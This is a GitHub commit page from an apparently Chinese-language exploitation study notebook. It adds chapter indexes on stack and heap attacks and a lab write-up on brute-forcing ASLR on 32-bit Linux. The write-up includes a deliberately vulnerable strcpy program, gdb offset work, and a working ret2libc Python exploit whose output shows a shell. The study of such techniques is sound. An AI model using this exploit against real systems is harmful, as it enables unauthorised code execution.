Skip to content
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.

Commit 3177a46

Browse files
author
Sn0rt
committedMar 20, 2017
update: with new post of stack
1 parent b128e14 commit 3177a46

File tree

4 files changed

+961
-0
lines changed

4 files changed

+961
-0
lines changed
 

‎chapter2/README.md

Lines changed: 25 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1 +1,26 @@
11
# 栈的安全
2+
3+
4+
## 基本的漏洞利用
5+
6+
[format strings on linux32](./format-strings.md)
7+
8+
[Integer-overflow on Linux32](./integer-overflow.md)
9+
10+
[off by one on linux32](./off-by-one.md)
11+
12+
## 对抗基于栈上的安全机制
13+
14+
### NX
15+
16+
[ret2libc bypass nx on linux32](./linux-x86-ret2libc.md)
17+
18+
[rop on Linux32](./linux-x86-rop.md)
19+
20+
[rop chain on linux32](./linux-x86-rop-chain.md)
21+
22+
## ASLR
23+
24+
[got overwrite bypass aslr on linux32](./overwrite-got-bypass-aslr.md)
25+
26+
[brute force bypass aslr on linux32](./brute-force-bypass-aslr.md)

‎chapter2/brute-force-bypass-aslr.md

Lines changed: 131 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,131 @@
1+
# 0x00 beginning
2+
3+
记录学暴力破解 32 位 Linux bypass ASLR 的过程, 实验部分来自`sploitfun`[^origin].
4+
5+
>What is brute-force?
6+
7+
在这个技术中攻击者随意选择一个`libc`的基地址来持续攻击直到成功, 这个技术是最简单`bypass`的 ASLR 的方法, 当然需要一定运气.
8+
9+
演示代码如下:
10+
11+
```shell
12+
// gcc -fno-stack-protector
13+
// echo 2 > /proc/sys/kernel/randomize_va_space
14+
15+
#include <stdio.h>
16+
#include <string.h>
17+
18+
int main(int argc, char* argv[]) {
19+
char buf[256];
20+
strcpy(buf,argv[1]);
21+
printf("%s\n",buf);
22+
fflush(stdout);
23+
return 0;
24+
}
25+
```
26+
27+
# 0x01 analysis
28+
29+
当地址随机化开启时候, 发现可以 libc 的每次加载地址都不一样, 但是有规律可循.
30+
31+
```shell
32+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
33+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7580000)
34+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
35+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75c5000)
36+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
37+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7612000)
38+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
39+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb753d000)
40+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
41+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7563000)
42+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
43+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb755a000)
44+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
45+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb757d000)
46+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
47+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75c7000)
48+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
49+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7564000)
50+
Sn0rt@warzone:~/lab$ ldd ./aslr_2|grep libc
51+
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7553000)
52+
```
53+
54+
`libc`随机化只变化 0xb75 后面的两个数字, 因此最大尝试次数 256(2^8) 次时某次随机化的地址总可能又一次被用到, 在下面的`exp`选择`libc`的起始基地址`0xb7595000`进行多次尝试.
55+
56+
# 0x02 how to use?
57+
58+
exp 中 offset 的偏移还是用 peda 套路! offset 是 268.
59+
60+
其中`system_arg`我是利用`libc`中"/bin/sh"相对于`system()`在 libc 中的偏移计算的, 利用 gdb`print`两个然后减法运算就可以, 具体操作如下
61+
62+
```shell
63+
gdb-peda$ p system
64+
$1 = {<text variable, no debug info>} 0xb7e63190 <__libc_system>
65+
gdb-peda$ searchmem "bin/sh" libc
66+
Searching for 'bin/sh' in: libc ranges
67+
Found 1 results, display max 1 items:
68+
libc : 0xb7f83a25 ("bin/sh")
69+
gdb-peda$ ^Z
70+
[1]+ Stopped gdb -q aslr_2
71+
Sn0rt@warzone:~/lab$ python
72+
Python 2.7.6 (default, Mar 22 2014, 22:59:38)
73+
[GCC 4.8.2] on linux2
74+
Type "help", "copyright", "credits" or "license" for more information.
75+
>>> hex(0xb7f83a25-0xb7e63190)
76+
'0x120895L'
77+
>>>
78+
```
79+
80+
参数填充 exp:
81+
82+
```python
83+
#!/usr/bin/env python
84+
85+
from subprocess import call
86+
from pwn import p32
87+
88+
libc_base_addr = 0xb7595000
89+
exit_offset = 0x000331e0
90+
system_offset = 0x00040190
91+
92+
system_addr = libc_base_addr + system_offset
93+
exit_addr = libc_base_addr + exit_offset
94+
95+
system_arg = system_addr + 0x00120894
96+
97+
payload = "A" * 268 + p32(system_addr) + p32(exit_addr) + p32(system_arg)
98+
99+
i = 0
100+
while (i < 256):
101+
print "Number of tries: %d" %i
102+
ret = call(["./aslr_2", payload])
103+
i += 1
104+
```
105+
其实这里 exp 已经完成了, 不过如果成功过后有点扫尾工作需要做, 把尾部加上
106+
107+
```python
108+
ret = call(["./aslr_2", payload])
109+
i += 1
110+
if (not ret):
111+
break
112+
else:
113+
print "Exploit failed"
114+
```
115+
116+
```shell
117+
...
118+
Number of tries: 79
119+
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�Q]���\�$Zo
120+
$ uid=1042(Sn0rt) gid=1043(Sn0rt) groups=1043(Sn0rt)
121+
$
122+
```
123+
需要多运行几次, 有时候会执行失败, 或者执行成功没有会显示.
124+
125+
# 0x03 doubt
126+
127+
这个技术利用了在同一个`libc`文件中函数偏移是相对的构造出 shellcode, 因此我填写的`libc`基地址又一次命中, 下面攻击就水到渠成, 按照理论这个脚本一次就可以命中`libc`, 为什么需要多次执行才能 get shell?
128+
129+
### reference
130+
131+
[^origin]: [sploitfun](https://sploitfun.wordpress.com/2015/05/08/bypassing-aslr-part-ii/)

‎chapter2/overwrite-got-bypass-aslr.md

Lines changed: 785 additions & 0 deletions
Large diffs are not rendered by default.

‎chapter3/README.md

Lines changed: 20 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1 +1,21 @@
11
# 堆安全
2+
3+
## Linux 下基本的堆管理机制
4+
5+
[ptmalloc2](./ptmalloc2.md)
6+
7+
8+
## 套路研习
9+
10+
[heap overflow using unlink on linux32](./linux-x86-unlink.md) 过期!
11+
12+
[heap overflow with using malloc maleficarum on linux32](./heap-overflow-uisng-malloc-maleficarum.md)
13+
14+
[off-by-one vulnerability (heap based) on linux32](./linux-x86-off-by-one.md) 过期!
15+
16+
[use after free on linux32](./linux-x86-UAF.md) 主流!
17+
18+
19+
20+
21+

0 commit comments

Comments
 (0)
Please sign in to comment.